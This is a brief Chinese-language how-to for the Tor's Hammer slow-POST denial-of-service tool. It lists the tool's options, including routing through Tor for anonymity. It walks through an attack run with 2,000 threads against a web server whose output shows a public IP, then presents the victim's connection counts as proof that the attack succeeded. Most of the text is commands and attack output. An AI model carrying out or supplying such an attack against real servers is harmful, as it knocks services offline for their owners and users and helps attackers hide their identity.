torshammer是另一个不错的DOS测试工具。 它是用Python编写的。 这个工具有一个额外的优势:它可以通过TOR匿名网络执行攻击。 这是一个非常有效的工具,它可以在几秒内杀了Apache和IIS服务器。
工具使用很简单,只需解压后就可使用
tar xf torshammer.tgz
解压完以后会有三个文件
socks.py terminal.py torshammer.py
只需运行./torshammer.py
前提是有安装python
/*
* Tor's Hammer
* Slow POST DoS Testing Tool
* entropy [at] phiral.net
* Anon-ymized via Tor
* We are Legion.
*/
./torshammer.py -t <target> [-r <threads> -p <port> -T -h]
-t|--target <Hostname|IP>
-r|--threads <Number of threads> Defaults to 256
-p|--port <Web Server Port> Defaults to 80
-T|--tor Enable anonymising through tor on 127.0.0.1:9050
-h|--help Shows this help
Eg. ./torshammer.py -t 192.168.1.100 -r 256
上面解释的很清楚:
-t
:指定主机
-r
:指定连接数量
-p
:指定端口(这里只针对web server且默认端口为80)
-T
:挂代理的使用方式
之后就可以使用了和例子一样:
./torshammer.py -t 192.168.10.73 -r 2000
这里我们连接数多一些,效果明显,启动以后的程序
/*
* Tor's Hammer
* Slow POST DoS Testing Tool
* entropy [at] phiral.net
* Anon-ymized via Tor
* We are Legion.
*/
/*
* Target: 211.155.84.73 Port: 80
* Threads: 2000 Tor: False
* Give 20 seconds without tor or 40 with before checking site
*/
Posting: 0
Posting: h
Posting: c
反应在被攻击的主机上,可以用ss -s
命令来查看
Total: 2325 (kernel 2334)
TCP: 2012 (estab 2002, closed 3, orphaned 0, synrecv 0, timewait 3/0), ports 10
Transport Total IP IPv6
* 2334 - -
RAW 0 0 0
UDP 14 8 6
TCP 2009 2008 1
INET 2023 2016 7
FRAG 0 0 0
可以看到estab 2002
estab这个参数明显升高,正常一般都会是10一下。这里也可以证明我们的攻击成功了。